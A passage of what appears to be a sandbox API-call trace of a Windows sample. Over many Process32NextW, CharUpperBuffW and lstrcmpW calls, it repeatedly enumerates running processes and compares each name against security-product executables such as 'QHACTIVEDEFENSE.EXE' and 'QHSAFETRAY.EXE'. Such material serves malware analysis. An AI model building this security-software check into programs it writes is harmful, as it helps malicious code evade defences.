(lpString="svchost.exe") returned 11 [0162.959] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.959] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.959] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0162.959] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0162.959] lstrlenW (lpString="winpoint.exe") returned 12 [0162.960] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0162.960] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.960] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0162.960] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0162.960] lstrlenW (lpString="cmd.exe") returned 7 [0162.960] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0162.960] lstrcmpW (lpString1="CMD.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.960] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0162.961] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0162.961] lstrlenW (lpString="conhost.exe") returned 11 [0162.961] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0162.961] lstrcmpW (lpString1="CONHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.961] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0162.962] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0162.962] lstrlenW (lpString="PING.EXE") returned 8 [0162.962] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0162.962] lstrcmpW (lpString1="PING.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.962] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0162.962] CloseHandle (hObject=0xe0) returned 1 [0162.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0162.968] lstrcpyW (in: lpString1=0x18f8e4, lpString2="QHSAFETRAY.EXE" | out: lpString1="QHSAFETRAY.EXE") returned="QHSAFETRAY.EXE" [0162.968] lstrlenW (lpString="QHSAFETRAY.EXE") returned 14 [0162.968] CharUpperBuffW (in: lpsz="QHSAFETRAY.EXE", cchLength=0xe | out: lpsz="QHSAFETRAY.EXE") returned 0xe [0162.968] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.969] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0162.970] lstrlenW (lpString="[System Process]") returned 16 [0162.970] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0162.970] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="QHSAFETRAY.EXE") returned -1 [0162.970] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.974] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0162.974] lstrlenW (lpString="System") returned 6 [0162.974] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0162.974] lstrcmpW (lpString1="SYSTEM", lpString2="QHSAFETRAY.EXE") returned 1 [0162.974] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.974] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0162.974] lstrlenW (lpString="smss.exe") returned 8 [0162.974] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0162.974] lstrcmpW (lpString1="SMSS.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.974] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.975] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.975] lstrlenW (lpString="csrss.exe") returned 9 [0162.975] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.975] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.975] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.976] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0162.976] lstrlenW (lpString="wininit.exe") returned 11 [0162.976] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0162.976] lstrcmpW (lpString1="WININIT.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.976] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.976] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.976] lstrlenW (lpString="csrss.exe") returned 9 [0162.976] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.976] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.976] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.977] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0162.977] lstrlenW (lpString="winlogon.exe") returned 12 [0162.977] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0162.977] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.977] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.978] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0162.978] lstrlenW (lpString="services.exe") returned 12 [0162.978] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0162.978] lstrcmpW (lpString1="SERVICES.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.978] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.978] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0162.978] lstrlenW (lpString="lsass.exe") returned 9 [0162.978] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0162.978] lstrcmpW (lpString1="LSASS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.978] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0162.979] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0162.979] lstrlenW (lpString="lsm.exe") returned 7 [0162.979] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0162.979] lstrcmpW (lpString1="LSM.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.979] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.980] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.980] lstrlenW (lpString="svchost.exe") returned 11 [0162.980] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.980] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.980] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.980] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.980] lstrlenW (lpString="svchost.exe") returned 11 [0162.980] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.981] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.981] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.981] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.981] lstrlenW (lpString="svchost.exe") returned 11 [0162.981] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.981] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.981] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.982] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.982] lstrlenW (lpString="svchost.exe") returned 11 [0162.982] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.982] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.982] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.982] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.982] lstrlenW (lpString="svchost.exe") returned 11 [0162.983] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.983] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.983] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.983] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0162.983] lstrlenW (lpString="audiodg.exe") returned 11 [0162.983] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0162.983] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.983] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.984] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.984] lstrlenW (lpString="svchost.exe") returned 11 [0162.984] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.984] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.984] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.987] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.987] lstrlenW (lpString="svchost.exe") returned 11 [0162.987] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.987] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.987] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.988] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0162.988] lstrlenW (lpString="spoolsv.exe") returned 11 [0162.988] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0162.988] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.988] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.989] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.989] lstrlenW (lpString="svchost.exe") returned 11 [0162.989] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.989] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.989] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.990] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.990] lstrlenW (lpString="taskhost.exe") returned 12 [0162.990] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0162.990] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.990] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.991] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.991] lstrlenW (lpString="taskeng.exe") returned 11 [0162.991] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.991] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.991] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.991] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0162.991] lstrlenW (lpString="dwm.exe") returned 7 [0162.992] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0162.992] lstrcmpW (lpString1="DWM.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.992] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.992] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0162.992] lstrlenW (lpString="explorer.exe") returned 12 [0162.992] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0162.992] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.992] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.993] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.993] lstrlenW (lpString="taskeng.exe") returned 11 [0162.993] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.993] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.994] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0162.995] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0162.995] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0162.995] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0162.995] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0162.995] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.997] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.998] lstrlenW (lpString="taskhost.exe") returned 12 [0162.998] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0162.998] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0162.998] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.003] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.003] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.003] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.003] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.004] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.005] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.005] lstrlenW (lpString="tri.exe") returned 7 [0163.005] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.006] lstrcmpW (lpString1="TRI.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.006] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.008] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.008] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.008] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.008] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.009] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.010] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.010] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.010] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.011] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.011] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.013] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.013] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.013] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.013] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.013] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 